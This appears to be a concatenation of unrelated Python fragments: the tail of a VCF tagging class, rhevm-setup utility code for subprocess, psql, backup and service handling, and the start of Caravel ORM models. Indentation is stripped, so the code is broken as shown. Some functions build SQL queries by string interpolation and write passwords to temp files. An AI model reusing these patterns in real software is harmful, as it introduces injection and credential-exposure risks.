"""Provides metaheaders for VcfReader; adds summary tags to VcfRecords."""
def __init__(self, vcf_reader):
self._tags = [_AlleleFreqZScoreTag(vcf_reader),
_DepthZScoreTag(vcf_reader)]
self._metaheaders = self._init_metaheaders(self._tags)
@staticmethod
def _init_metaheaders(tags):
metaheaders = []
for tag in tags:
metaheaders.extend(tag.metaheaders)
return tuple(metaheaders)
@property
def metaheaders(self):
return self._metaheaders
def add_tags(self, vcf_record):
for tag in self._tags:
tag.add_tag_values(vcf_record)
return vcf_record.text()
|
|
"""
contains all common and re-usable code for rhevm-setup and sub packages
"""
import grp
import pwd
import logging
import subprocess
import re
import output_messages
import traceback
import os
import basedefs
import datetime
import libxml2
import types
import shutil
import time
import tempfile
"""
ENUM implementation for python (from the vdsm team)
usage:
#define
enum = Enum(Key1=1, Key2=2)
#use
type = enum.Key1
print type => (prints 1)
# reverse lookup
print enum[2] => (prints Key2)
# value lookup
print enum.parse("Key1") => (prints 1)
"""
class Enum(object):
"""
A nice class to handle Enums gracefully.
"""
def __init__(self, **pairs):
#Generate reverse dict
self._reverse = dict([(b, a) for a, b in pairs.iteritems()])
#Generate attributes
for key, value in pairs.iteritems():
setattr(self, key, value)
def __getitem__(self, index):
return self._reverse[index]
def __iter__(self):
return self._reverse.itervalues()
def parse(self, value):
#If value is enum name convert to value
if isinstance(value, str):
if hasattr(self, value):
return getattr(self, value)
#If value is a number assume parsing meant converting the value to int
#if you can think of a more generic way feel free to change
if value.isdigit():
value = int(value)
#If not check if value is a value of the enum
if value in self._reverse:
return value
#Enum doesn't know this value
raise ValueError(output_messages.ERR_EXP_VALUE_ERR%(value))
class ConfigFileHandler:
def __init__(self, filepath):
self.filepath = filepath
def open(self):
pass
def close(self):
pass
def editParams(self, paramsDict):
pass
def delParams(self, paramsDict):
pass
class TextConfigFileHandler(ConfigFileHandler):
def __init__(self, filepath, sep="="):
ConfigFileHandler.__init__(self, filepath)
self.data = []
self.sep = sep
def open(self):
fd = file(self.filepath)
self.data = fd.readlines()
fd.close()
def close(self):
fd = file(self.filepath, 'w')
for line in self.data:
fd.write(line)
fd.close()
def getParam(self, param):
value = None
for line in self.data:
if not re.match("\s*#", line):
found = re.match("\s*%s\s*\%s\s*(.+)$" % (param, self.sep), line)
if found:
value = found.group(1)
return value
def editParam(self, param, value):
changed = False
for i, line in enumerate(self.data[:]):
if not re.match("\s*#", line):
if re.match("\s*%s"%(param), line):
self.data[i] = "%s%s%s\n"%(param, self.sep, value)
changed = True
break
if not changed:
self.data.append("%s%s%s\n"%(param, self.sep, value))
def editLine(self, regexp, newLine, failOnError=False, errMsg=output_messages.ERR_FAILURE):
changed = False
for i, line in enumerate(self.data[:]):
if not re.match("\s*#", line):
if re.match(regexp, line):
self.data[i] = newLine
changed = True
break
if not changed:
if failOnError:
raise Exception(errMsg)
else:
logging.warn(errMsg)
def delParams(self, paramsDict):
pass
class XMLConfigFileHandler(ConfigFileHandler):
def __init__(self, filepath):
ConfigFileHandler.__init__(self, filepath)
self.content = []
def open(self):
with open(self.filepath, 'r') as f:
self.content = f.readlines()
libxml2.keepBlanksDefault(0)
self.doc = libxml2.parseFile(self.filepath)
self.ctxt = self.doc.xpathNewContext()
def close(self):
self.doc.saveFormatFile(self.filepath,1)
self.doc.freeDoc()
self.ctxt.xpathFreeContext()
def xpathEval(self, xpath):
return self.ctxt.xpathEval(xpath)
def registerNs(self, nsPrefix, uri):
return self.ctxt.xpathRegisterNs(nsPrefix, uri)
def getNs(self, ns):
for line in self.content:
# Match line includes xmlns=NS:X:X
match = re.match("(.*)xmlns=\"(%s:\d\.\d*)(.*)" % (ns), line)
if match:
return match.group(2)
raise Exception(output_messages.ERR_EXP_UPD_XML_FILE % self.filepath)
def editParams(self, paramsDict):
editAllOkFlag = True
if type(paramsDict) != types.DictType:
raise Exception(output_messages.ERR_EXP_ILLG_PARAM_TYPE)
for key in paramsDict.iterkeys():
editOkFlag = False
nodeList = self.ctxt.xpathEval(key)
if len(nodeList) == 1:
nodeList[0].setContent(paramsDict[key])
editOkFlag = True
elif len(nodeList) == 0:
parentNode = os.path.dirname(key)
parentNodeList = self.ctxt.xpathEval(parentNode)
if len(parentNodeList) == 1:
newNode = libxml2.newNode(os.path.basename(key))
newNode.setContent(paramsDict[key])
parentNodeList[0].addChild(newNode)
editOkFlag = True
if not editOkFlag:
logging.error("Failed editing %s" %(key))
editAllOkFlag = False
if not editAllOkFlag:
return -1
def delParams(self, paramsDict):
pass
def removeNodes(self, xpath):
nodes = self.xpathEval(xpath)
#delete the node
for node in nodes:
node.unlinkNode()
node.freeNode()
def addNodes(self, xpath, xml):
"""
Add a given xml into a specific point specified by the given xpath path into the xml object
xml can be either a libxml2 instance or a string which contains a valid xml
"""
parentNode = self.xpathEval(xpath)[0]
if not parentNode:
raise Exception(output_messages.ERR_EXP_UPD_XML_CONTENT%(xpath, len(parentNode)))
if isinstance(xml, str):
newNode = libxml2.parseDoc(xml)
elif isinstance(xml, libxml2.xmlDoc):
newNode = xml
else:
raise Exception(output_messages.ERR_EXP_UNKN_XML_OBJ)
# Call xpathEval to strip the metadata string from the top of the new xml node
parentNode.addChild(newNode.xpathEval('/*')[0])
def getXmlNode(xml, xpath):
nodes = xml.xpathEval(xpath)
if len(nodes) != 1:
raise Exception(output_messages.ERR_EXP_UPD_XML_CONTENT%(xpath, len(nodes)))
return nodes[0]
def setXmlContent(xml, xpath,content):
node = xml.xpathEval(xpath)
if len(node) == 0:
parentNode = xml.xpathEval(os.path.dirname(xpath))
if len(parentNode) == 1:
parentNode[0].newChild(None, os.path.basename(xpath), content)
else:
raise Exception(output_messages.ERR_EXP_UPD_XML_CONTENT%(xpath, len(parentNode)))
elif len(xml.xpathEval(xpath)) == 1:
node = getXmlNode(xml, xpath)
node.setContent(content)
else:
raise Exception(output_messages.ERR_EXP_UPD_XML_CONTENT%(xpath, len(node)))
def getColoredText (text, color):
''' gets text string and color
and returns a colored text.
the color values are RED/BLUE/GREEN/YELLOW
everytime we color a text, we need to disable
the color at the end of it, for that
we use the NO_COLOR chars.
'''
return color + text + basedefs.NO_COLOR
def isTcpPortOpen(port):
"""
checks, using lsof, whether a given tcp port is open
and being listened on.
if the port is open, returns the process name & pid that use it
"""
answer = False
process = False
pid = False
logging.debug("Checking if TCP port %s is open by any process" % port)
cmd = [
basedefs.EXEC_LSOF,
"-i", "-n", "-P",
]
output, rc = execCmd(cmdList=cmd, failOnError=True, msg=output_messages.ERR_EXP_LSOF)
#regex catches:
#java 17564 jboss 90u IPv4 1251444 0t0 TCP *:3873 (LISTEN)
pattern=re.compile("^(\w+)\s+(\d+)\s+.+TCP\s\*\:(%s)\s\(LISTEN\)$" % (port))
list = output.split("\n")
for line in list:
result = re.match(pattern, line)
if result:
process = result.group(1)
pid = result.group(2)
answer = True
logging.debug("TCP port %s is open by process %s, PID %s" % (port, process, pid))
return (answer, process, pid)
def execCmd(cmdList, cwd=None, failOnError=False, msg=output_messages.ERR_RC_CODE, maskList=[], useShell=False, usePipeFiles=False):
"""
Run external shell command with 'shell=false'
receives a list of arguments for command line execution
"""
# All items in the list need to be strings, otherwise the subprocess will fail
cmd = [str(item) for item in cmdList]
# We need to join cmd list into one string so we can look for passwords in it and mask them
logCmd = _maskString((' '.join(cmd)), maskList)
logging.debug("Executing command --> '%s'"%(logCmd))
stdErrFD = subprocess.PIPE
stdOutFD = subprocess.PIPE
stdInFD = subprocess.PIPE
if usePipeFiles:
(stdErrFD, stdErrFile) = tempfile.mkstemp(dir="/tmp")
(stdOutFD, stdOutFile) = tempfile.mkstemp(dir="/tmp")
(stdInFD, stdInFile) = tempfile.mkstemp(dir="/tmp")
# We use close_fds to close any file descriptors we have so they won't be copied to forked children
proc = subprocess.Popen(cmd, stdout=stdOutFD,
stderr=stdErrFD, stdin=stdInFD, cwd=cwd, shell=useShell, close_fds=True)
out, err = proc.communicate()
if usePipeFiles:
with open(stdErrFile, 'r') as f:
err = f.read()
os.remove(stdErrFile)
with open(stdOutFile, 'r') as f:
out = f.read()
os.remove(stdOutFile)
os.remove(stdInFile)
logging.debug("output = %s"%(out))
logging.debug("stderr = %s"%(err))
logging.debug("retcode = %s"%(proc.returncode))
output = out + err
if failOnError and proc.returncode != 0:
raise Exception(msg)
return ("".join(output.splitlines(True)), proc.returncode)
def execSqlCommand(userName, dbName, sqlQuery, failOnError=False, errMsg=output_messages.ERR_SQL_CODE):
logging.debug("running sql query \'%s\' on db." % sqlQuery)
cmd = [
basedefs.EXEC_PSQL,
"-U", userName,
"-d", dbName,
"-c", sqlQuery,
]
return execCmd(cmdList=cmd, failOnError=failOnError, msg=errMsg)
#TODO: refactor this and previous functions into same execution.
def execRemoteSqlCommand(userName, dbHost, dbPort, dbName, sqlQuery, failOnError=False, errMsg=output_messages.ERR_SQL_CODE):
logging.debug("running sql query '%s' on db server: \'%s\'." % (sqlQuery, dbHost))
cmd = [
basedefs.EXEC_PSQL,
"-h", dbHost,
"-p", dbPort,
"-U", userName,
"-d", dbName,
"-c", sqlQuery,
]
return execCmd(cmdList=cmd, failOnError=failOnError, msg=errMsg)
def replaceWithLink(target, link):
"""
replace link with a symbolic link to source
if link does not exist, simply create the link
"""
try:
#TODO: export create symlink to utils and reuse in all rhevm-setup
if os.path.exists(link):
if os.path.islink(link):
logging.debug("removing link %s" % link)
os.unlink(link)
elif os.path.isdir(link):
#remove dir using shutil.rmtree
logging.debug("removing directory %s" % link)
shutil.rmtree(link)
else:
logging.debug("removing file %s" % link)
os.remove(link)
logging.debug("Linking %s to %s" % (target, link))
os.symlink(target, link)
except:
logging.error(traceback.format_exc())
raise
def getUsernameId(username):
return pwd.getpwnam(username)[2]
def getGroupId(groupName):
return grp.getgrnam(groupName)[2]
def findAndReplace(path, oldstr, newstr):
regex = '(%s)'%(oldstr)
p = re.compile(regex)
try:
# Read file content
fd = file(path)
fileText = fd.readlines()
fd.close()
# Change content
fd = file(path, 'w')
for line in fileText:
line = p.sub(newstr, line)
fd.write(line)
fd.close()
except:
logging.error(traceback.format_exc())
raise Exception(output_messages.ERR_EXP_FIND_AND_REPLACE%(path))
def byLength(word1, word2):
"""
Compares two strings by their length
Returns:
Negative if word2 > word1
Positive if word1 > word2
Zero if word1 == word2
"""
return len(word1) - len(word2)
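# Illustrative usage (Python 2 cmp-style comparator):
#   sorted(["bb", "a", "ccc"], cmp=byLength)  ->  ["a", "bb", "ccc"]
# The same ordering can be obtained with sorted(words, key=len).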
def nslookup(address):
cmd = [
basedefs.EXEC_NSLOOKUP, address,
]
#since nslookup will return 0 no matter what, the RC is irrelevant
output, rc = execCmd(cmdList=cmd)
return output
def getConfiguredIps():
try:
iplist=set()
cmd = [
basedefs.EXEC_IP, "addr",
]
output, rc = execCmd(cmdList=cmd, failOnError=True, msg=output_messages.ERR_EXP_GET_CFG_IPS_CODES)
ipaddrPattern=re.compile('\s+inet (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}).+')
list=output.splitlines()
for line in list:
foundIp = ipaddrPattern.search(line)
if foundIp:
if foundIp.group(1) != "127.0.0.1":
ipAddr = foundIp.group(1)
logging.debug("Found IP Address: %s"%(ipAddr))
iplist.add(ipAddr)
return iplist
except:
logging.error(traceback.format_exc())
raise Exception(output_messages.ERR_EXP_GET_CFG_IPS)
def getCurrentDateTime(isUtc=None):
now = None
if (isUtc is not None):
now = datetime.datetime.utcnow()
else:
now = datetime.datetime.now()
return now.strftime("%Y_%m_%d_%H_%M_%S")
def verifyStringFormat(str, matchRegex):
'''
Verify that the string given matches the matchRegex.
for example:
string: 111-222
matchRegex: \d{3}-\d{3}
this will return true since the string matches the regex
'''
pattern = re.compile(matchRegex)
result = re.match(pattern, str)
if result == None:
return False
else:
return True
def getAvailableSpace(path):
logging.debug("Checking available space on %s" % (path))
stat = os.statvfs(path)
#block size * available blocks = available space in bytes, we divide by
#1024 ^ 2 in order to get the size in megabytes
availableSpace = (stat.f_bsize * stat.f_bavail) / pow(1024, 2)
logging.debug("Available space on %s is %s" % (path, availableSpace))
return int(availableSpace)
def transformUnits(size):
""" Transform the number of size param (received in MB)
into an appropriate units string (MB/GB)"""
if size > 1024:
return "%.02f" % (float(size) / 1024.0) + " Gb"
else:
return str(size) + " Mb"
def compareStrIgnoreCase(str1, str2):
''' compare 2 strings and ignore case
if one of the inputs is not a str (e.g. a bool) - fall back to a normal compare
'''
if type(str1) == types.StringType and type(str2) == types.StringType:
return str1.lower() == str2.lower()
else:
return str1 == str2
def parseStrRegex(string, regex, errMsg):
"""
Gets a text string and a regex pattern
and returns the extracted sub-string
captured.
"""
rePattern = re.compile(regex)
found = rePattern.search(string)
if found:
match = found.group(1)
logging.debug("found new parsed string: %s"%(match))
return match
else:
raise Exception(errMsg)
def copyFile(filename, destination, uid=-1, gid=-1, filemod=-1):
"""
copy filename to
the destDir path
give the target file uid:gid ownership
and file mod
filename - full path to src file (not directories!)
destination - full path to target dir or filename
uid - integer with user id (default -1 leaves the original uid)
gid - integer with group id (default -1 leaves the original gid)
filemod - integer with file mode (default -1 keeps original mode)
"""
# If the source is a directory, throw an exception since this func handles only files
if (os.path.isdir(filename)):
raise Exception(output_messages.ERR_SOURCE_DIR_NOT_SUPPORTED)
# In case the src file is a symbolic link, we'll get the origin filename
fileSrc = os.path.realpath(filename)
# In default, assume the destination is a file
targetFile = destination
# Copy file to destination
shutil.copy2(fileSrc, destination)
logging.debug("successfully copied file %s to target destination %s"%(fileSrc, destination))
# Get the file basename, if the destination is a directory
if (os.path.isdir(destination)):
fileBasename = os.path.basename(fileSrc)
targetFile = os.path.join(destination, fileBasename)
# Set file mode, uid and gid to the file
logging.debug("setting file %s uid/gid ownership"%(targetFile))
os.chown(targetFile, uid, gid)
logging.debug("setting file %s mode to %d"%(targetFile, filemod))
os.chmod(targetFile, filemod)
def getDbAdminUser():
"""
Retrieve Admin user from .pgpass file on the system.
Use default settings if file is not found.
"""
admin_user = getDbConfig("admin")
if admin_user:
return admin_user
return basedefs.DB_ADMIN
def getDbUser():
"""
Retrieve DB user from .pgpass file on the system.
Use default settings if file is not found.
"""
db_user = getDbConfig("user")
if db_user:
return db_user
return basedefs.DB_USER
def getDbHostName():
"""
Retrieve DB Host name from .pgpass file on the system.
Use default settings if file is not found, or '*' was used.
"""
host = getDbConfig("host")
if host and host != "*":
return host
return basedefs.DB_HOST
def getDbPort():
"""
Retrieve DB port number from .pgpass file on the system.
Use default settings if file is not found, or '*' was used.
"""
port = getDbConfig("port")
if port:
return port
return basedefs.DB_PORT
def getDbConfig(param):
"""
Generic function to retrieve values from admin line in .pgpass
"""
# 'user' and 'admin' are the same fields, just different lines
# and for different cases
field = {'user' : 3, 'admin' : 3, 'host' : 0, 'port' : 1}
if param not in field.keys():
return False
inDbAdminSection = False
inDbUserSection = False
if (os.path.exists(basedefs.DB_PASS_FILE)):
logging.debug("found existing pgpass file, fetching DB %s value" % param)
with open (basedefs.DB_PASS_FILE) as pgPassFile:
for line in pgPassFile:
# find the line with "DB ADMIN"
if basedefs.PGPASS_FILE_ADMIN_LINE in line:
inDbAdminSection = True
continue
if inDbAdminSection and param == "admin" and \
not line.startswith("#"):
# Means we're on DB ADMIN line, as it's for all DBs
dbcreds = line.split(":", 4)
return dbcreds[field[param]]
# find the line with "DB USER"
if basedefs.PGPASS_FILE_USER_LINE in line:
inDbUserSection = True
continue
# fetch the values
if inDbUserSection:
# Means we're on DB USER line, as it's for all DBs
dbcreds = line.split(":", 4)
return dbcreds[field[param]]
return False
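# Illustration of the .pgpass fields parsed above (hypothetical entry):
#   localhost:5432:*:engine:secret
# splitting on ":" gives host at index 0, port at index 1 and the user/admin
# name at index 3, matching the 'field' mapping in getDbConfig.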
def backupDB(db, user, backupFile, host="localhost", port="5432"):
"""
Backup postgres db
using pgdump
Args: file - a target file to backup to
db - db name to backup
user - db user to use for backup
host - db host where postgresql server runs
port - db connection port
"""
logging.debug("%s DB Backup started"%(db))
cmd = [
basedefs.EXEC_PGDUMP,
"-C", "-E",
"UTF8",
"--column-inserts",
"--disable-dollar-quoting",
"--disable-triggers",
"--format=p",
"-f", backupFile,
"-U", user,
"-h", host,
"-p", port,
db,
]
output, rc = execCmd(cmdList=cmd, failOnError=True, msg=output_messages.ERR_DB_BACKUP)
logging.debug("%s DB Backup completed successfully"%(db))
def restoreDB(user, host, port, backupFile):
"""
Restore postgres db
using pgrestore
Args: file - a db backup file to restore from
user - db user to use for backup
host - db host where postgresql server runs
port - db connection port
"""
# Restore
logging.debug("DB Restore started")
cmd = [
basedefs.EXEC_PSQL,
"-h", host,
"-p", port,
"-U", user,
"-d", basedefs.DB_POSTGRES,
"-f", backupFile,
]
output, rc = execCmd(cmdList=cmd, failOnError=True, msg=output_messages.ERR_DB_RESTORE)
logging.debug("DB Restore completed successfully")
def renameDB(oldname, newname):
"""docstring for renameDb"""
if oldname == newname:
return
logging.info("Renaming '%s' to '%s'..." % (oldname, newname))
sqlQuery="ALTER DATABASE %s RENAME TO %s" % (oldname, newname)
execRemoteSqlCommand(getDbUser(), getDbHostName(), getDbPort(),
basedefs.DB_POSTGRES, sqlQuery, True,
output_messages.ERR_DB_RENAME % (oldname, newname))
def updateVDCOption(key, value, maskList=[], keyType='text'):
"""
Update vdc_option value in db
using rhevm-config
maskList is received to allow
masking passwords in logging
keyType can be 'text' or 'pass' for password
"""
# Mask passwords
logValue = _maskString(value, maskList)
logging.debug("updating vdc option %s to: %s"%(key, logValue))
msg = output_messages.ERR_EXP_UPD_VDC_OPTION%(key, logValue)
# The first part of the command is really simple:
cmd = [
basedefs.FILE_RHEVM_CONFIG_BIN,
]
# For text options we just provide the name of the option and the value in
# the command line, but for password options we have to put the password in
# an external file and provide the name of that file:
passFile = None
if keyType == 'pass':
passFile = mkTempPassFile(value)
cmd.extend([
'-s',
key,
'--admin-pass-file=%s' % passFile,
])
else:
cmd.extend([
'-s',
'%s=%s' % (key, value),
])
# The rest of the arguments for engine-config are the same for all kind of
# options:
cmd.extend([
'--cver=' + basedefs.VDC_OPTION_CVER,
'-p',
basedefs.FILE_RHEVM_EXTENDED_CONF,
])
# Execute the command, and always remember to remove the password file:
try:
output, rc = execCmd(cmdList=cmd, failOnError=True, msg=msg, maskList=maskList)
finally:
if passFile:
os.remove(passFile)
def mkTempPassFile(value):
t = tempfile.NamedTemporaryFile(delete=False)
t.file.write(value)
t.file.close()
return t.name
def _maskString(string, maskList=[]):
"""
private func to mask passwords
in utils
"""
maskedStr = string
for maskItem in maskList:
maskedStr = maskedStr.replace(maskItem, "*"*8)
return maskedStr
def getRpmVersion(rpmName=basedefs.ENGINE_RPM_NAME):
"""
extracts rpm version
from a given rpm package name
default rpm is 'rhevm'
returns version (string)
"""
# Update build number on welcome page
logging.debug("retrieving build number for %s rpm"%(rpmName))
cmd = [
basedefs.EXEC_RPM,
"-q",
"--queryformat", "'%{VERSION}-%{RELEASE}'",
rpmName,
]
rpmVersion, rc = execCmd(cmdList=cmd, failOnError=True, msg=output_messages.ERR_READ_RPM_VER % rpmName)
# Return rpm version
return rpmVersion
def retry(func, expectedException=Exception, tries=None, timeout=None, sleep=1):
"""
Retry a function. Wraps the retry logic so you don't have to
implement it each time you need it.
:param func: The callable to run.
:param expectedException: The exception you expect to receive when the function fails.
:param tries: The number of times to try. None, 0 or -1 means infinite.
:param timeout: The time you want to spend waiting. This **WILL NOT** interrupt the function.
It just stops retrying once the timeout has elapsed.
:param sleep: Time to sleep between calls in seconds.
"""
if tries in [0, None]:
tries = -1
if timeout in [0, None]:
timeout = -1
startTime = time.time()
while True:
tries -= 1
try:
return func()
except expectedException:
if tries == 0:
raise
if (timeout > 0) and ((time.time() - startTime) > timeout):
raise
time.sleep(sleep)
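# Illustrative usage (hypothetical parameters): retry a flaky call up to five
# times, sleeping 2 seconds between attempts and giving up after 30 seconds:
#   retry(checkIfDbIsUp, expectedException=Exception, tries=5, timeout=30, sleep=2)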
def checkIfDbIsUp():
"""
func to test if the db is up
will throw exception on error
and not return a value
"""
logging.debug("checking if db is already installed and running..")
execRemoteSqlCommand(getDbUser(), getDbHostName(), getDbPort(), basedefs.DB_NAME, "select 1", True)
def localHost(hostname):
# Create an ip set of possible IPs on the machine. Set has only unique values, so
# there's no problem with union.
# TODO: cache the list somehow? There's no point querying the IP configuration all the time.
ipset = getConfiguredIps().union(set([ "localhost", "127.0.0.1"]))
if hostname in ipset:
return True
return False
def clearDbConnections(dbName):
""" Lock local DB and clear active connections """
# Block new connections first
logging.info("Closing DB '%s' for new connections" % dbName)
query = "update pg_database set datallowconn = 'false' where datname = '%s';" % dbName
cmd = [
basedefs.EXEC_PSQL,
"-U", getDbAdminUser(),
"-c", query,
]
execCmd(cmdList=cmd, failOnError=True, msg=output_messages.ERR_DB_CONNECTIONS_BLOCK)
# Disconnect active connections
logging.info("Disconnect active connections from DB '%s'" % dbName)
query = "SELECT pg_terminate_backend(procpid) FROM pg_stat_activity WHERE datname = '%s'" % dbName
cmd = [
basedefs.EXEC_PSQL,
"-U", getDbAdminUser(),
"-c", query,
]
execCmd(cmdList=cmd, failOnError=True, msg=output_messages.ERR_DB_CONNECTIONS_CLEAR)
def listTempDbs():
""" Create a list of temp DB's on the server with regex 'engine_*' """
dbListRemove = [basedefs.DB_NAME]
cmd = [
basedefs.EXEC_PSQL,
"-U", getDbAdminUser(),
"-h", getDbHostName(),
"-p", getDbPort(),
"--list",
]
output, rc = execCmd(cmdList=cmd, msg=output_messages.ERR_DB_TEMP_LIST)
if rc:
logging.error(output_messages.ERR_DB_TEMP_LIST)
raise Exception ("\n" + output_messages.ERR_DB_TEMP_LIST + "\n")
# if there are temp DB that need to be removed, add them to DB list
tempDbs = re.findall("^engine_\w*", output)
if len(tempDbs) > 0:
dbListRemove.extend(tempDbs)
return dbListRemove
# TODO: Support SystemD services
class Service():
def __init__(self, name):
self.wasStopped = False
self.wasStarted = False
self.name = name
def isServiceAvailable(self):
if os.path.exists("/etc/init.d/%s" % self.name):
return True
return False
def start(self, raiseFailure = False):
logging.debug("starting %s", self.name)
(output, rc) = self._serviceFacility("start")
if rc == 0:
self.wasStarted = True
elif raiseFailure:
raise Exception(output_messages.ERR_FAILED_START_SERVICE % self.name)
return (output, rc)
def stop(self, raiseFailure = False):
logging.debug("stopping %s", self.name)
(output, rc) = self._serviceFacility("stop")
if rc == 0:
self.wasStopped = True
elif raiseFailure:
raise Exception(output_messages.ERR_FAILED_STOP_SERVICE % self.name)
return (output, rc)
def autoStart(self, start=True):
mode = "on" if start else "off"
cmd = [
basedefs.EXEC_CHKCONFIG, self.name, mode,
]
execCmd(cmdList=cmd, failOnError=True)
def conditionalStart(self, raiseFailure = False):
"""
Will only start if wasStopped is set to True
"""
if self.wasStopped:
logging.debug("Service %s was stopped. starting it again"%self.name)
return self.start(raiseFailure)
else:
logging.debug("Service was not stopped. there for we're not starting it")
return (False, False)
def status(self):
logging.debug("getting status for %s", self.name)
(output, rc) = self._serviceFacility("status")
return (output, rc)
def _serviceFacility(self, action):
"""
Execute the command "service NAME action"
returns: output, rc
"""
logging.debug("executing action %s on service %s", self.name, action)
cmd = [
basedefs.EXEC_SERVICE, self.name, action
]
return execCmd(cmdList=cmd, usePipeFiles=True)
def chown(target,uid, gid):
logging.debug("chown %s to %s:%s" % (target, uid, gid))
os.chown(target, uid, gid)
def chownToEngine(target):
uid = getUsernameId(basedefs.ENGINE_USER_NAME)
gid = getGroupId(basedefs.ENGINE_GROUP_NAME)
chown(target, uid, gid)
def installed(rpm):
cmd = [
basedefs.EXEC_RPM,
"-q",
rpm,
]
output, rc = execCmd(cmd)
return rc == 0
def setHttpPortsToNonProxyDefault(controller):
logging.debug("Changing HTTP_PORT & HTTPS_PORT to the default non-proxy values (8080 & 8443)")
httpParam = controller.getParamByName("HTTP_PORT")
httpParam.setKey("DEFAULT_VALUE", basedefs.JBOSS_HTTP_PORT)
httpParam = controller.getParamByName("HTTPS_PORT")
httpParam.setKey("DEFAULT_VALUE", basedefs.JBOSS_HTTPS_PORT)
|
|
"""A collection of ORM sqlalchemy models for Caravel"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import functools
import json
import logging
import textwrap
from collections import namedtuple
from copy import deepcopy, copy
from datetime import timedelta, datetime, date
import humanize
import pandas as pd
import requests
import sqlalchemy as sqla
import sqlparse
from dateutil.parser import parse
from flask import request, g
from flask_appbuilder import Model
from flask_appbuilder.models.mixins import AuditMixin
from flask_appbuilder.models.decorators import renders
from flask_babel import lazy_gettext as _
from pydruid.client import PyDruid
from pydruid.utils.filters import Dimension, Filter
from pydruid.utils.postaggregator import Postaggregator
from pydruid.utils.having import Aggregation
from six import string_types
from sqlalchemy import (
Column, Integer, String, ForeignKey, Text, Boolean, DateTime, Date,
Table, create_engine, MetaData, desc, asc, select, and_, func)
from sqlalchemy.engine import reflection
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import relationship
from sqlalchemy.sql import table, literal_column, text, column
from sqlalchemy_utils import EncryptedType
import caravel
from caravel import app, db, get_session, utils, sm
from caravel.viz import viz_types
from caravel.utils import flasher, MetricPermException, DimSelector
config = app.config
QueryResult = namedtuple('QueryResult', ['df', 'query', 'duration'])
class JavascriptPostAggregator(Postaggregator):
def __init__(self, name, field_names, function):
self.post_aggregator = {
'type': 'javascript',
'fieldNames': field_names,
'name': name,
'function': function,
}
self.name = name
class AuditMixinNullable(AuditMixin):
"""Altering the AuditMixin to use nullable fields
Allows creating objects programmatically outside of CRUD
"""
created_on = Column(DateTime, default=datetime.now, nullable=True)
changed_on = Column(
DateTime, default=datetime.now,
onupdate=datetime.now, nullable=True)
@declared_attr
def created_by_fk(cls): # noqa
return Column(Integer, ForeignKey('ab_user.id'),
default=cls.get_user_id, nullable=True)
@declared_attr
def changed_by_fk(cls): # noqa
return Column(
Integer, ForeignKey('ab_user.id'),
default=cls.get_user_id, onupdate=cls.get_user_id, nullable=True)
@renders('created_on')
def creator(self): # noqa
return '{}'.format(self.created_by or '')
@property
def changed_by_(self):
return '{}'.format(self.changed_by or '')
@renders('changed_on')
def changed_on_(self):
return '<span class="no-wrap">{}</span>'.format(self.changed_on)
@renders('changed_on')
def modified(self):
s = humanize.naturaltime(datetime.now() - self.changed_on)
return '<span class="no-wrap">{}</nobr>'.format(s)
@property
def icons(self):
return """
<a
href="{self.datasource_edit_url}"
data-toggle="tooltip"
title="{self.datasource}">
<i class="fa fa-database"></i>
</a>
""".format(**locals())
class Url(Model, AuditMixinNullable):
"""Used for the short url feature"""
__tablename__ = 'url'
id = Column(Integer, primary_key=True)
url = Column(Text)
class CssTemplate(Model, AuditMixinNullable):
"""CSS templates for dashboards"""
__tablename__ = 'css_templates'
id = Column(Integer, primary_key=True)
template_name = Column(String(250))
css = Column(Text, default='')
slice_user = Table('slice_user', Model.metadata,
Column('id', Integer, primary_key=True),
Column('user_id', Integer, ForeignKey('ab_user.id')),
Column('slice_id', Integer, ForeignKey('slices.id'))
)
class Slice(Model, AuditMixinNullable):
"""A slice is essentially a report or a view on data"""
__tablename__ = 'slices'
id = Column(Integer, primary_key=True)
slice_name = Column(String(250))
druid_datasource_id = Column(Integer, ForeignKey('datasources.id'))
table_id = Column(Integer, ForeignKey('tables.id'))
datasource_type = Column(String(200))
datasource_name = Column(String(2000))
viz_type = Column(String(250))
params = Column(Text)
description = Column(Text)
cache_timeout = Column(Integer)
perm = Column(String(2000))
table = relationship(
'SqlaTable', foreign_keys=[table_id], backref='slices')
druid_datasource = relationship(
'DruidDatasource', foreign_keys=[druid_datasource_id], backref='slices')
owners = relationship("User", secondary=slice_user)
def __repr__(self):
return self.slice_name
@property
def datasource(self):
return self.table or self.druid_datasource
@renders('datasource_name')
def datasource_link(self):
if self.table:
return self.table.link
elif self.druid_datasource:
return self.druid_datasource.link
@property
def datasource_edit_url(self):
if self.table:
return self.table.url
elif self.druid_datasource:
return self.druid_datasource.url
@property
@utils.memoized
def viz(self):
d = json.loads(self.params)
viz_class = viz_types[self.viz_type]
return viz_class(self.datasource, form_data=d)
@property
def description_markeddown(self):
return utils.markdown(self.description)
@property
def datasource_id(self):
return self.table_id or self.druid_datasource_id
@property
def data(self):
"""Data used to render slice in templates"""
d = {}
self.token = ''
try:
d = self.viz.data
self.token = d.get('token')
except Exception as e:
d['error'] = str(e)
d['slice_id'] = self.id
d['slice_name'] = self.slice_name
d['description'] = self.description
d['slice_url'] = self.slice_url
d['edit_url'] = self.edit_url
d['description_markeddown'] = self.description_markeddown
return d
@property
def json_data(self):
return json.dumps(self.data)
@property
def slice_url(self):
"""Defines the url to access the slice"""
try:
slice_params = json.loads(self.params)
except Exception as e:
logging.exception(e)
slice_params = {}
slice_params['slice_id'] = self.id
slice_params['json'] = "false"
slice_params['slice_name'] = self.slice_name
from werkzeug.urls import Href
href = Href(
"/caravel/explore/{obj.datasource_type}/"
"{obj.datasource_id}/".format(obj=self))
return href(slice_params)
@property
def edit_url(self):
return "/slicemodelview/edit/{}".format(self.id)
@property
def slice_link(self):
url = self.slice_url
return '<a href="{url}">{obj.slice_name}</a>'.format(
url=url, obj=self)
def set_perm(mapper, connection, target): # noqa
if target.table_id:
src_class = SqlaTable
id_ = target.table_id
elif target.druid_datasource_id:
src_class = DruidDatasource
id_ = target.druid_datasource_id
ds = db.session.query(src_class).filter_by(id=int(id_)).first()
target.perm = ds.perm
sqla.event.listen(Slice, 'before_insert', set_perm)
sqla.event.listen(Slice, 'before_update', set_perm)
dashboard_slices = Table(
'dashboard_slices', Model.metadata,
Column('id', Integer, primary_key=True),
Column('dashboard_id', Integer, ForeignKey('dashboards.id')),
Column('slice_id', Integer, ForeignKey('slices.id')),
)
dashboard_user = Table(
